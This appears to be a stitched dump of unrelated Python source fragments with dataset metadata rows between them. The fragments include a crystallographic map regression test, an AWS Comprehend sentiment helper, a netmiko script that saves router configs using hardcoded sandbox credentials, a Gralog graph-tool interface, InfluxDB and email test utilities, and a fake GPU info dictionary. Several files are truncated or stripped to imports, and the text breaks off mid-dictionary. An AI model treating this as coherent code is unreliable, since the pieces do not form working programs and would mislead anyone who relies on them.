  Check maptbx.target_and_gradients_simple against the two stand-alone
  calls real_space_target_simple and real_space_gradients_simple: the
  combined object must reproduce both results exactly.
  """
  # Reference structure plus a shaken copy to evaluate against.
  model = random_structure.xray_structure(
    space_group_info=sgtbx.space_group_info("P212121"),
    elements=["N","C","O","S","P"]*10,
    volume_per_atom=50)
  target_map, tmp, tmp = compute_map(xray_structure=model)
  shaken = model.deep_copy_scatterers()
  shaken.shake_sites_in_place(mean_distance=0.8)
  cell = model.unit_cell()
  coords = shaken.sites_cart()
  everything = flex.bool(shaken.scatterers().size(), True)
  # Reference values from the stand-alone functions.
  expected_target = maptbx.real_space_target_simple(
    unit_cell=cell,
    density_map=target_map,
    sites_cart=coords,
    selection=everything)
  expected_grads = maptbx.real_space_gradients_simple(
    unit_cell=cell,
    density_map=target_map,
    sites_cart=coords,
    delta=0.25,
    selection=everything)
  # The combined call must agree with both.
  combined = maptbx.target_and_gradients_simple(
    unit_cell=cell,
    map_target=target_map,
    sites_cart=coords,
    delta=0.25,
    selection=everything)
  assert approx_equal(expected_target, combined.target())
  for expected, got in zip(expected_grads, combined.gradients()):
    assert approx_equal(expected, got)
def exercise_04():
  """
  Exercise maptbx.target_and_gradients_simple in action: minimization
  (bigger model).

  A 50-atom structure shaken by ~0.3 A must refine back to within
  0.015 A mean distance using the "simple" target.
  """
  xrs = random_structure.xray_structure(
    space_group_info = sgtbx.space_group_info("P212121"),
    elements         = ["N","C","O","S","P"]*10,
    volume_per_atom  = 150)
  map_target,tmp,tmp = compute_map(xray_structure = xrs)
  xrs_sh = xrs.deep_copy_scatterers()
  xrs_sh.shake_sites_in_place(mean_distance=0.3)
  start_error = flex.mean(xrs.distances(other = xrs_sh))
  assert start_error > 0.29
  map_current, miller_array, crystal_gridding = compute_map(
    xray_structure = xrs_sh)
  # Refine a copy so the shaken structure itself stays untouched.
  xrs_sh_ = xrs_sh.deep_copy_scatterers()
  minimized = minimization.run(
    xray_structure              = xrs_sh_,
    miller_array                = miller_array,
    crystal_gridding            = crystal_gridding,
    map_target                  = map_target,
    max_iterations              = 500,
    min_iterations              = 25,
    step                        = 0.5,
    geometry_restraints_manager = None,
    target_type                 = "simple")
  xrs_sh_ = xrs_sh_.replace_sites_cart(minimized.sites_cart)
  final_error = flex.mean(xrs.distances(other = xrs_sh_))
  assert final_error < 0.015
# Run all regression exercises when invoked as a script.
if (__name__ == "__main__"):
  exercise_00()
  exercise_01()
  exercise_02()
  exercise_03()
  exercise_04()
| 36.235577 | 80 | 0.667109 |
fe66e2796ab20353c3b7dbe7a834d55cb22ebb8a | 1,212 | py | Python | open_imagilib/matrix.py | viktor-ferenczi/open-imagilib | 3e7328840d58fd49eda28490e9bddf91390b1981 | [
"MIT"
] | 2 | 2022-01-17T17:22:01.000Z | 2022-01-22T13:11:33.000Z | open_imagilib/matrix.py | viktor-ferenczi/open-imagilib | 3e7328840d58fd49eda28490e9bddf91390b1981 | [
"MIT"
] | null | null | null | open_imagilib/matrix.py | viktor-ferenczi/open-imagilib | 3e7328840d58fd49eda28490e9bddf91390b1981 | [
"MIT"
] | null | null | null | """ LED matrix
"""
__all__ = ['Matrix']
from .colors import Color, on, off
from .fonts import font_6x8
| 26.347826 | 89 | 0.487624 |
fe6806edfc8769087714d9060a7456450c7a5f90 | 1,608 | py | Python | tests/env_config/test_base.py | DAtek/datek-app-utils | 4783345d548bd85b1f6f99679be30b978e368e0e | [
"MIT"
] | null | null | null | tests/env_config/test_base.py | DAtek/datek-app-utils | 4783345d548bd85b1f6f99679be30b978e368e0e | [
"MIT"
] | 2 | 2022-02-05T12:15:03.000Z | 2022-03-27T09:55:51.000Z | tests/env_config/test_base.py | DAtek/datek-app-utils | 4783345d548bd85b1f6f99679be30b978e368e0e | [
"MIT"
] | null | null | null | from pytest import raises
from datek_app_utils.env_config.base import BaseConfig
from datek_app_utils.env_config.errors import InstantiationForbiddenError
| 28.714286 | 84 | 0.651741 |
fe68679524344d1cb6b9cfd2e5daf3c7c5e16099 | 1,704 | py | Python | comprehend.py | korniichuk/cvr-features | ed3569222781258d4de242db3c9b51f19573bacb | [
"Unlicense"
] | null | null | null | comprehend.py | korniichuk/cvr-features | ed3569222781258d4de242db3c9b51f19573bacb | [
"Unlicense"
] | null | null | null | comprehend.py | korniichuk/cvr-features | ed3569222781258d4de242db3c9b51f19573bacb | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
# Name: comprehend
# Version: 0.1a2
# Owner: Ruslan Korniichuk
# Maintainer(s):
import boto3
def get_sentiment(text, language_code='en'):
    """Get sentiment.

    Inspects text and returns an inference of the prevailing sentiment
    (positive, neutral, mixed, or negative) via AWS Comprehend.

    Args:
        text: UTF-8 text string. Each string must contain fewer that
            5,000 bytes of UTF-8 encoded characters (required | type: str).
        language_code: language of text (not required | type: str |
            default: 'en').

    Returns:
        sentiment: positive, neutral, mixed, or negative (type: str).

    Raises:
        Whatever botocore raises on API failure (propagated unchanged).
    """
    comprehend = boto3.client('comprehend')
    text = prepare_text(text)
    # Bug fix: the language was previously hardcoded to 'en', silently
    # ignoring the ``language_code`` argument. The pointless
    # ``except Exception as e: raise e`` wrapper is also gone — the
    # exception propagates identically without it.
    r = comprehend.detect_sentiment(Text=text, LanguageCode=language_code)
    sentiment = r['Sentiment'].lower()
    return sentiment
# Example. Get sentiment of text below:
# "I ordered a small and expected it to fit just right but it was a little bit
# more like a medium-large. It was great quality. It's a lighter brown than
# pictured but fairly close. Would be ten times better if it was lined with
# cotton or wool on the inside."
# text = "I ordered a small and expected it to fit just right but it was a \
# little bit more like a medium-large. It was great quality. It's a \
# lighter brown than pictured but fairly close. Would be ten times \
# better if it was lined with cotton or wool on the inside."
# get_sentiment(text)
| 32.150943 | 78 | 0.6473 |
fe68c2686760a20f5158d8a2bc5c4a835377dc27 | 6,801 | py | Python | mapclientplugins/argonsceneexporterstep/ui_configuredialog.py | Kayvv/mapclientplugins.argonsceneexporterstep | 59b0b9cb15660c5747c1a7cba9da0e1eaf0bdf48 | [
"Apache-2.0"
] | null | null | null | mapclientplugins/argonsceneexporterstep/ui_configuredialog.py | Kayvv/mapclientplugins.argonsceneexporterstep | 59b0b9cb15660c5747c1a7cba9da0e1eaf0bdf48 | [
"Apache-2.0"
] | null | null | null | mapclientplugins/argonsceneexporterstep/ui_configuredialog.py | Kayvv/mapclientplugins.argonsceneexporterstep | 59b0b9cb15660c5747c1a7cba9da0e1eaf0bdf48 | [
"Apache-2.0"
] | 3 | 2021-07-26T00:53:24.000Z | 2021-11-17T23:23:11.000Z | # -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'configuredialog.ui'
##
## Created by: Qt User Interface Compiler version 5.15.2
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
| 44.45098 | 113 | 0.723276 |
fe6923b1aa562920cf3b40c7be4c7dd797b7d3f4 | 1,039 | py | Python | pbx_gs_python_utils/lambdas/utils/puml_to_slack.py | owasp-sbot/pbx-gs-python-utils | f448aa36c4448fc04d30c3a5b25640ea4d44a267 | [
"Apache-2.0"
] | 3 | 2018-12-14T15:43:46.000Z | 2019-04-25T07:44:58.000Z | pbx_gs_python_utils/lambdas/utils/puml_to_slack.py | owasp-sbot/pbx-gs-python-utils | f448aa36c4448fc04d30c3a5b25640ea4d44a267 | [
"Apache-2.0"
] | 1 | 2019-05-11T14:19:37.000Z | 2019-05-11T14:51:04.000Z | pbx_gs_python_utils/lambdas/utils/puml_to_slack.py | owasp-sbot/pbx-gs-python-utils | f448aa36c4448fc04d30c3a5b25640ea4d44a267 | [
"Apache-2.0"
] | 4 | 2018-12-27T04:54:14.000Z | 2019-05-11T14:07:47.000Z | import base64
import tempfile
import requests
from osbot_aws.apis import Secrets
from osbot_aws.apis.Lambdas import Lambdas
| 28.081081 | 86 | 0.589028 |
fe694e90c7ac984d467776f89ad0bcfbd5ee4819 | 2,131 | py | Python | src/system_io/input.py | DeseineClement/bigdata-housing-classifier | aa864056c8b25217821f59d16c1ba5725c21a185 | [
"MIT"
] | null | null | null | src/system_io/input.py | DeseineClement/bigdata-housing-classifier | aa864056c8b25217821f59d16c1ba5725c21a185 | [
"MIT"
] | null | null | null | src/system_io/input.py | DeseineClement/bigdata-housing-classifier | aa864056c8b25217821f59d16c1ba5725c21a185 | [
"MIT"
] | null | null | null | from sys import argv
from getopt import getopt
from os import R_OK, access
from string import Template
DEFAULT_DATASET_FILE_PATH = "dataset/data.csv"
DEFAULT_DATASET_COLUMNS = ['surface (m2)', 'height (m)', 'latitude', 'housing_type', 'longitude', 'country_code',
'city']
DEFAULT_VISU = ["scatter_plot", "histogram"]
DEFAULT_RANGE = [0, 1000]
| 41.784314 | 120 | 0.633975 |
fe6bf9a13a6fe5e608e3131b9e7d5730fd32e4d4 | 1,490 | py | Python | netmiko/example7.py | Tes3awy/Ntemiko-Examples | b29aa3b0de14916f1ebac5b0f1ed7fe37d8740ba | [
"MIT"
] | 3 | 2021-05-20T05:34:49.000Z | 2022-02-14T03:35:10.000Z | netmiko/example7.py | Tes3awy/Ntemiko-Examples | b29aa3b0de14916f1ebac5b0f1ed7fe37d8740ba | [
"MIT"
] | null | null | null | netmiko/example7.py | Tes3awy/Ntemiko-Examples | b29aa3b0de14916f1ebac5b0f1ed7fe37d8740ba | [
"MIT"
] | 2 | 2021-08-19T12:34:47.000Z | 2022-03-28T15:48:55.000Z | # Must run example4.py first
# Read an Excel sheet and save running config of devices using pandas
import pandas as pd
from netmiko import ConnectHandler
# Read Excel file of .xlsx format (the inventory written by example4.py).
data = pd.read_excel(io="Example4-Device-Details.xlsx", sheet_name=0)
# Convert data to data frame
df = pd.DataFrame(data=data)
# Convert data frame MGMT IP Address column to a list.
# NOTE(review): assumes column index 1 holds the MGMT IP addresses —
# confirm against the sheet layout produced by example4.py.
device_ip_list = df.iloc[:, 1].tolist()
# Build one netmiko connection dict per device IP.
devices = []
for ip in device_ip_list:
    devices.append(
        {
            "device_type": "cisco_ios",  # must be the same for all devices
            "ip": ip,
            "username": "developer",  # must be the same for all devices
            "password": "C1sco12345",  # must be the same for all devices
            "port": 22,  # must be the same for all devices
            # If port for all devices is not 22 you will get an error
            "fast_cli": False,
        }
    )
for device in devices:
    # Create a connection instance
    with ConnectHandler(**device) as net_connect:
        # hostname of the current device (TextFSM parses "show version"
        # output into a list of dicts)
        hostname = net_connect.send_command(
            command_string="show version", use_textfsm=True
        )[0]["hostname"]
        run_cfg: str = net_connect.send_command(command_string="show running-config")
        # Create .txt for each running configuration of each device
        with open(file=f"{hostname}_ex7-run-cfg.txt", mode="w") as outfile:
            outfile.write(run_cfg.lstrip())
print("Done")
| 31.702128 | 85 | 0.658389 |
fe6cc530fb4e5b20aac699a77d75b91318a5ca68 | 2,385 | py | Python | inference-engine/tests/ie_test_utils/functional_test_utils/layer_tests_summary/utils/constants.py | plaidml/openvino | e784ab8ab7821cc1503d9c5ca6034eea112bf52b | [
"Apache-2.0"
] | null | null | null | inference-engine/tests/ie_test_utils/functional_test_utils/layer_tests_summary/utils/constants.py | plaidml/openvino | e784ab8ab7821cc1503d9c5ca6034eea112bf52b | [
"Apache-2.0"
] | 105 | 2020-06-04T00:23:29.000Z | 2022-02-21T13:04:33.000Z | inference-engine/tests/ie_test_utils/functional_test_utils/layer_tests_summary/utils/constants.py | mpapaj/openvino | 37b46de1643a2ba6c3b6a076f81d0a47115ede7e | [
"Apache-2.0"
] | 1 | 2020-10-23T06:45:11.000Z | 2020-10-23T06:45:11.000Z | # Copyright (C) 2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
# Operations whose conformance test references have been verified.
# Bug fix: the original list was missing commas after 'Floor-1',
# 'FloorMod-1', 'Result-1' and 'Sinh-1', so Python silently concatenated
# adjacent string literals into bogus entries such as
# 'Floor-1FloorMod-1GRUSequence-5'. The commas are restored below and the
# duplicate 'GRUSequence-5' entry that this uncovered has been removed.
VERIFIED_OP_REFERENCES = [
    'Abs-1',
    'Acos-1',
    'Add-1',
    'Asin-1',
    'Asinh-3',
    'Assign-6',
    'AvgPool-1',
    'BatchNormInference-5',
    'BatchToSpace-2',
    'BinaryConvolution-1',
    'Broadcast-1',
    'Broadcast-3',
    'Bucketize-3',
    'Ceiling-1',
    'CTCGreedyDecoder-1',
    'CTCGreedyDecoderSeqLen-6',
    'Concat-1',
    'Convert-1',
    'ConvertLike-1',
    'Convolution-1',
    'Constant-1',
    'Cos-1',
    'Cosh-1',
    'DeformableConvolution-1',
    'DeformablePSROIPooling-1',
    'DepthToSpace-1',
    'DetectionOutput-1',
    'Divide-1',
    'ExperimentalDetectronDetectionOutput-6',
    'ExperimentalDetectronGenerateProposalsSingleImage-6',
    'ExperimentalDetectronPriorGridGenerator-6',
    'ExperimentalDetectronROIFeatureExtractor-6',
    'ExperimentalDetectronTopKROIs-6',
    'FakeQuantize-1',
    'Floor-1',
    'FloorMod-1',
    'GRUSequence-5',
    'Gather-1',
    'GatherElements-6',
    'GatherND-5',
    'Gelu-7',
    'GRN-1',
    'GroupConvolution-1',
    'GroupConvolutionBackpropData-1',
    'HSigmoid-5',
    'HSwish-4',
    'HardSigmoid-1',
    'Interpolate-4',
    'LRN-1',
    'LSTMCell-4',
    'LSTMSequence-5',
    'LogSoftmax-5',
    'Loop-5',
    'MVN-6',
    'Maximum-1',
    'MaxPool-1',
    'Mish-4',
    'Multiply-1',
    'Negative-1',
    'NonMaxSuppression-4',
    'NonMaxSuppression-5',
    'NonZero-3',
    'NormalizeL2-1',
    'PriorBox-1',
    'PriorBoxClustered-1',
    'Proposal-1',
    'Proposal-4',
    'PSROIPooling-1',
    'RNNSequence-5',
    'ROIAlign-3',
    'ROIPooling-2',
    'Range-1',
    'Range-4',
    'ReadValue-6',
    'ReduceL1-4',
    'ReduceL2-4',
    'ReduceLogicalAnd-1',
    'ReduceLogicalOr-1',
    'ReduceMax-1',
    'ReduceMean-1',
    'ReduceMin-1',
    'ReduceProd-1',
    'ReduceSum-1',
    'RegionYOLO-1',
    'Relu-1',
    'ReorgYOLO-2',
    'Result-1',
    'Round-5',
    'SpaceToDepth-1',
    'ScatterNDUpdate-4',
    'Select-1',
    'ShapeOf-1',
    'ShapeOf-3',
    'ShuffleChannels-1',
    'Sigmoid-1',
    'Sign-1',
    'Sin-1',
    'Sinh-1',
    'SoftPlus-4',
    'Softmax-1',
    'Split-1',
    'Squeeze-1',
    'StridedSlice-1',
    'Subtract-1',
    'Swish-4',
    'Tile-1',
    'TopK-1',
    'TopK-3',
    'Transpose-1',
    'Unsqueeze-1',
    'VariadicSplit-1',
]
| 20.211864 | 58 | 0.568134 |
fe6ce225addf6075e565169dfeb40c47ef8bca4d | 18,542 | py | Python | ghub/githubutils.py | mahanthathreyee/ghub | b212ca068ef530d034095e6ef5d964e4e78dc022 | [
"MIT"
] | null | null | null | ghub/githubutils.py | mahanthathreyee/ghub | b212ca068ef530d034095e6ef5d964e4e78dc022 | [
"MIT"
] | null | null | null | ghub/githubutils.py | mahanthathreyee/ghub | b212ca068ef530d034095e6ef5d964e4e78dc022 | [
"MIT"
] | null | null | null | """Utilities for interacting with GitHub"""
import os
import json
import webbrowser
import stat
import sys
from git import Repo
from .context import Context
# Maps a GitHub issue-event type to a callable that renders a one-line,
# human-readable description from the raw event payload dict.
event_dict = {
    "added_to_project": (
        lambda event: "{} added the issue to a project.".format(event["actor"]["login"])
    ),
    "assigned": (
        lambda event: "{} assigned the issue to {}.".format(
            event["actor"]["login"], event["assignee"]["login"]
        )
    ),
    "closed": (lambda event: "{} closed this issue.".format(event["actor"]["login"])),
    "converted_note_to_issue": (
        lambda event: "{} created this issue from a note.".format(
            event["actor"]["login"]
        )
    ),
    "demilestoned": (lambda event: "The issue was removed from a milestone."),
    "head_ref_deleted": (lambda event: "The pull request's branch was deleted."),
    "head_ref_restored": (lambda event: "The pull request's branch was restored."),
    # NOTE(review): event["label"] is likely a dict ({"name", "color"} per the
    # GitHub API) and will be rendered as its repr here — confirm and use
    # event["label"]["name"] if so.
    "labelled": (
        lambda event: "{} added {} label to the issue.".format(
            event["actor"]["login"], event["label"]
        )
    ),
    "locked": (
        lambda event: "The issue was locked by {}.".format(event["actor"]["login"])
    ),
    "mentioned": (
        lambda event: "{} was mentioned in the issue's body.".format(
            event["actor"]["login"]
        )
    ),
    "marked_as_duplicate": (
        lambda event: "The issue was marked duplicate by {}.".format(
            event["actor"]["login"]
        )
    ),
    "merged": (
        lambda event: "The issue was merged by {}.".format(event["actor"]["login"])
    ),
    "milestoned": (lambda event: "The issue was added to a milestone."),
    "moved_columns_in_project": (
        lambda event: "The issue was moved between columns in a project board."
    ),
    "referenced": (lambda event: "The issue was referenced from a commit message."),
    "renamed": (lambda event: "The title of the issue was changed."),
    # Fixed: trailing period added for consistency with the other messages.
    "reopened": (
        lambda event: "The issue was reopened by {}.".format(event["actor"]["login"])
    ),
    "review_dismissed": (
        lambda event: "{} dismissed a review from the pull request.".format(
            event["actor"]["login"]
        )
    ),
    "review_requested": (
        lambda event: "{} requested review from the subject on this pull request.".format(
            event["actor"]["login"]
        )
    ),
    "review_request_removed": (
        lambda event: "{} removed the review request for the subject on this pull request.".format(
            event["actor"]["login"]
        )
    ),
    "subscribed": (
        lambda event: "{} subscribed to receive notifications for the issue.".format(
            event["actor"]["login"]
        )
    ),
    "transferred": (lambda event: "The issue was transferred to another repository."),
    "unassigned": (
        lambda event: "{} was unassigned from the issue.".format(
            event["actor"]["login"]
        )
    ),
    "unlabeled": (lambda event: "A label was removed from the issue."),
    # Fixed: trailing period added for consistency with the other messages.
    "unlocked": (
        lambda event: "The issue was unlocked by {}.".format(event["actor"]["login"])
    ),
    # Fixed: was the garbled "The was unmarked as dublicate."
    "unmarked_as_duplicate": (lambda event: "The issue was unmarked as duplicate."),
    "user_blocked": (lambda event: "A user was blocked from the organization."),
}
# GitHub's REST API reports the label event type as "labeled"; the original
# (misspelled) "labelled" key is kept for backward compatibility.
event_dict["labeled"] = event_dict["labelled"]
def authorize(ghub, reauthorize=False, fromenv=False):
    """Authorize a user for GHub.

    Keyword arguments:
    ghub -- the ghub object that needs authorization
    reauthorize -- performs the interactive OAuth flow again even if a
                   cached token file exists (default False)
    fromenv -- load previously stored OAuth data from the GHUB_CRED
               environment variable instead of the cache file (default False)

    Returns True on success; exits the process on network failure during
    the token exchange.
    """
    if fromenv:
        # Credentials injected via the environment (e.g. CI); no file access.
        oauth_data = json.loads(os.environ["GHUB_CRED"])
        ghub.oauth_data = oauth_data
        ghub.github.token = oauth_data
        return True
    # ghub.data_path is presumably a pathlib.Path (the `/` join below) --
    # TODO confirm against the GHub class definition.
    token_file = ghub.data_path / ghub.auth_filename
    if not os.path.isfile(token_file) or reauthorize:
        # Interactive OAuth web flow: open the browser, let the user grant
        # access, then exchange the redirect URL for an access token.
        authorization_base_url = "https://github.com/login/oauth/authorize"
        token_url = "https://github.com/login/oauth/access_token"
        authorization_url, _ = ghub.github.authorization_url(authorization_base_url)
        webbrowser.open(authorization_url)
        print("Please visit this site and grant access: {}".format(authorization_url))
        redirect_response = input(
            "Please enter the URL you were redirected to after granting access: "
        )
        try:
            response = ghub.github.fetch_token(
                token_url,
                client_secret=ghub.client_secret,
                authorization_response=redirect_response,
            )
        except Exception as e:
            print(e)
            print(
                "Network Error. Make sure you have a working internet connection and try again."
            )
            sys.exit(1)
        if not os.path.isdir(ghub.data_path):
            os.makedirs(ghub.data_path)
        # Context manager guarantees the file handle is closed even if
        # json.dump raises (the previous open()/close() pair leaked on error).
        with open(token_file, "w+") as data_file:
            json.dump(response, data_file)
        # The token is a secret: restrict the cache file to owner read/write.
        os.chmod(token_file, stat.S_IRUSR | stat.S_IWUSR)
        ghub.oauth_data = response
        return True
    else:
        # Reuse the cached token from a previous authorization.
        with open(token_file, "r") as data_file:
            oauth_data = json.loads(data_file.read())
        ghub.oauth_data = oauth_data
        ghub.github.token = oauth_data
        return True
| 36.936255 | 99 | 0.584349 |
fe6de4a21365edf7ffd30ec000387c588b119366 | 9,086 | py | Python | equipments/migrations/0001_initial.py | fagrimacs/fagrimacs_production | ea1a8f92c41c416309cc1fdd8deb02f41a9c95a0 | [
"MIT"
] | null | null | null | equipments/migrations/0001_initial.py | fagrimacs/fagrimacs_production | ea1a8f92c41c416309cc1fdd8deb02f41a9c95a0 | [
"MIT"
] | 8 | 2020-09-16T05:28:33.000Z | 2020-09-28T06:29:03.000Z | equipments/migrations/0001_initial.py | fagrimacs/fagrimacs_production | ea1a8f92c41c416309cc1fdd8deb02f41a9c95a0 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.7 on 2020-09-18 05:52
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import multiselectfield.db.fields
| 75.716667 | 499 | 0.637134 |
fe6f28fa08fad0c5dcac3f523f0415850eb9e77c | 3,495 | py | Python | dcos_installer/test_cli.py | nkhanal0/dcos | fe0571b6519c86b6c33db4af42c63ab3e9087dcf | [
"Apache-2.0"
] | 3 | 2017-02-05T06:58:28.000Z | 2017-05-12T07:28:53.000Z | dcos_installer/test_cli.py | nkhanal0/dcos | fe0571b6519c86b6c33db4af42c63ab3e9087dcf | [
"Apache-2.0"
] | 720 | 2017-02-08T04:04:19.000Z | 2021-09-14T14:04:56.000Z | dcos_installer/test_cli.py | nkhanal0/dcos | fe0571b6519c86b6c33db4af42c63ab3e9087dcf | [
"Apache-2.0"
] | 14 | 2017-02-08T03:57:24.000Z | 2019-10-28T12:14:49.000Z | import pytest
import gen
from dcos_installer import cli
| 34.60396 | 76 | 0.571674 |
fe70b613f1b25d8770820b6d2050c23b8fcae093 | 47,242 | py | Python | gralog-fx/src/main/java/gralog/gralogfx/piping/scripts/Gralog.py | gralog/gralog | 0ab2e3137b83950cdc4e9234d4df451a22034285 | [
"Apache-2.0",
"BSD-3-Clause"
] | 12 | 2016-11-11T13:24:48.000Z | 2022-01-27T19:49:36.000Z | gralog-fx/src/main/java/gralog/gralogfx/piping/scripts/Gralog.py | gralog/gralog | 0ab2e3137b83950cdc4e9234d4df451a22034285 | [
"Apache-2.0",
"BSD-3-Clause"
] | 6 | 2017-01-05T14:23:59.000Z | 2018-09-20T19:14:57.000Z | gralog-fx/src/main/java/gralog/gralogfx/piping/scripts/Gralog.py | gralog/gralog | 0ab2e3137b83950cdc4e9234d4df451a22034285 | [
"Apache-2.0",
"BSD-3-Clause"
] | 2 | 2019-11-25T18:17:00.000Z | 2020-06-04T21:38:50.000Z | #!/usr/bin/env python3
import sys
from random import randint
import os
try:
import networkx as nx
except:
print("gPrint#-1#" + "netwrokx not installed for " + sys.executable)
sys.stdout.flush()
try:
import igraph as ig
except:
print("gPrint#-1#" + "igraph not installed for " + sys.executable)
import xml.etree.cElementTree as ET
import math
# debugging = False
def rgbFormatter(colorRGB):
    """Format an RGB triple (indexable sequence of three ints) as "rgb(r,g,b)"."""
    r = colorRGB[0]
    g = colorRGB[1]
    b = colorRGB[2]
    # f-string replaces the previous manual concatenation; the str().rstrip()
    # round-trips there were no-ops for integer components.
    return f"rgb({r},{g},{b})"
def hexFormatter(colorHex):
    """Format a hex color string as "hex(rrggbb)", dropping a leading '#'.

    Robust against an empty string: the previous ``colorHex[0] == "#"``
    check raised IndexError on "".
    """
    if colorHex.startswith("#"):
        colorHex = colorHex[1:]
    # Trailing whitespace in the input was stripped by the original too.
    return f"hex({str(colorHex).rstrip()})"
def vertexId(vertex):
    """Return the numeric id of a Vertex; pass any other value through unchanged."""
    return vertex.getId() if isinstance(vertex, Vertex) else vertex
def edgeId(edge):
    """Return the numeric id of an Edge; pass any other value through unchanged."""
    return edge.getId() if isinstance(edge, Edge) else edge
def extractIdFromProperties(stringFromGralog):
    """Scan a comma-separated "key=value" property string from Gralog and
    return the value of the first "id" entry, or None when absent."""
    for entry in stringFromGralog.split(","):
        key, *rest = entry.split("=")
        if key == "id":
            return rest[0]
    return None
def edgeSplitter(edge):
    """Render an edge reference as the comma-separated string Gralog expects.

    Accepts a (start, end) vertex pair, a plain integer edge id, or an
    Edge object exposing getId().
    """
    if type(edge) == tuple and len(edge) == 2:
        # endpoint pair: emit "startId,endId"
        start, end = edge
        return "{},{}".format(str(vertexId(start)).rstrip(),
                              str(vertexId(end)).rstrip())
    if type(edge) == int:
        # already a bare edge id
        return str(edge).rstrip()
    # an Edge object: delegate to its id accessor
    return str(edge.getId()).rstrip()
fe7228704cb0dda0e1c0b7305078fa094d1a0478 | 2,843 | py | Python | influxdb/tests/server_tests/base.py | ocworld/influxdb-python | a6bfe3e4643fdc775c97e1c4f457bc35d86e631e | [
"MIT"
] | 2 | 2019-10-17T05:36:51.000Z | 2020-06-30T00:27:22.000Z | influxdb/tests/server_tests/base.py | ocworld/influxdb-python | a6bfe3e4643fdc775c97e1c4f457bc35d86e631e | [
"MIT"
] | null | null | null | influxdb/tests/server_tests/base.py | ocworld/influxdb-python | a6bfe3e4643fdc775c97e1c4f457bc35d86e631e | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Define the base module for server test."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import sys
from influxdb.tests import using_pypy
from influxdb.tests.server_tests.influxdb_instance import InfluxDbInstance
from influxdb.client import InfluxDBClient
if not using_pypy:
from influxdb.dataframe_client import DataFrameClient
| 30.902174 | 74 | 0.655645 |
fe739da7293d52a3a7c4940166ba21b32df8a642 | 9,107 | py | Python | genemail/testing.py | cadithealth/genemail | d906ad9deec70a6b19b66c244044d4466df2371a | [
"MIT"
] | 5 | 2015-08-13T05:22:54.000Z | 2018-08-28T14:14:55.000Z | genemail/testing.py | cadithealth/genemail | d906ad9deec70a6b19b66c244044d4466df2371a | [
"MIT"
] | null | null | null | genemail/testing.py | cadithealth/genemail | d906ad9deec70a6b19b66c244044d4466df2371a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#------------------------------------------------------------------------------
# file: $Id$
# auth: Philip J Grabner <grabner@cadit.com>
# date: 2013/10/21
# copy: (C) Copyright 2013 Cadit Health Inc., All Rights Reserved.
#------------------------------------------------------------------------------
# todo: this could be smarter... for example, it could:
# - detect when references resolve to the same content, but
# by different Content-IDs
# - detect when multipart sections could collapse to the same
# semantic structure
from __future__ import absolute_import
import unittest, email
from .util import smtpHeaderFormat
#------------------------------------------------------------------------------
def canonicalHeaders(message, ignore=None):
  '''
  Returns a canonical string representation of the `message` headers,
  with the following changes made:
  * The MIME boundary specified in the "Content-Type" header, if
    specified, removed.
  * Any headers listed in `ignore` are removed.
  :Parameters:
  ignore : list(str), optional, default: ['Content-Transfer-Encoding']
    List of headers that should not be included in the canonical
    form.
  '''
  if ignore is None:
    ignore = ['Content-Transfer-Encoding']
  # Header names are matched case-insensitively, so normalize the ignore
  # list once up front.
  ignore = [key.lower() for key in ignore]
  # Collapse duplicate headers: get_all() yields every value for a name;
  # sorting before joining makes the result order-independent.
  hdrs = {key.lower(): '; '.join(sorted(message.get_all(key)))
          for key in message.keys()
          if key.lower() not in ignore}
  # Rebuild Content-Type from its parsed parameters, dropping the MIME
  # "boundary" parameter (it varies between otherwise-identical messages).
  # filter(None, pair) drops the empty string for valueless parameters so
  # they render as "name" rather than "name=".
  hdrs['content-type'] = '; '.join(['='.join(filter(None, pair))
                                    for pair in message.get_params()
                                    if pair[0].lower() != 'boundary'])
  # Emit one "Name: value" line per header, sorted by (lowercased) name,
  # with a trailing newline.
  return '\n'.join([
    smtpHeaderFormat(key) + ': ' + hdrs[key]
    for key in sorted(hdrs.keys())]) + '\n'
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# end of $Id$
#------------------------------------------------------------------------------
| 41.584475 | 88 | 0.533326 |
fe74b07194e48e39b48840554a34c0fb3e4605a4 | 13,815 | py | Python | telemetry/telemetry/testing/internal/fake_gpu_info.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 2,151 | 2020-04-18T07:31:17.000Z | 2022-03-31T08:39:18.000Z | telemetry/telemetry/testing/internal/fake_gpu_info.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 4,640 | 2015-07-08T16:19:08.000Z | 2019-12-02T15:01:27.000Z | telemetry/telemetry/testing/internal/fake_gpu_info.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 698 | 2015-06-02T19:18:35.000Z | 2022-03-29T16:57:15.000Z | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This dictionary of GPU information was captured from a run of
# Telemetry on a Linux workstation with NVIDIA GPU. It helps test
# telemetry.internal.platform's GPUInfo class, and specifically the
# attributes it expects to find in the dictionary; if the code changes
# in an incompatible way, tests using this fake GPU info will begin
# failing, indicating this fake data must be updated.
#
# To regenerate it, import pdb in
# telemetry/internal/platform/gpu_info.py and add a call to
# pdb.set_trace() in GPUInfo.FromDict before the return statement.
# Print the attrs dictionary in the debugger and copy/paste the result
# on the right-hand side of this assignment. Then run:
#
# pyformat [this file name] | sed -e "s/'/'/g"
#
# and put the output into this file.
FAKE_GPU_INFO = {
'feature_status':
{
'flash_stage3d': 'enabled',
'gpu_compositing': 'enabled',
'video_decode': 'unavailable_software',
'flash_3d': 'enabled',
'webgl': 'enabled',
'video_encode': 'enabled',
'multiple_raster_threads': 'enabled_on',
'2d_canvas': 'unavailable_software',
'rasterization': 'disabled_software',
'flash_stage3d_baseline': 'enabled'
},
'aux_attributes':
{
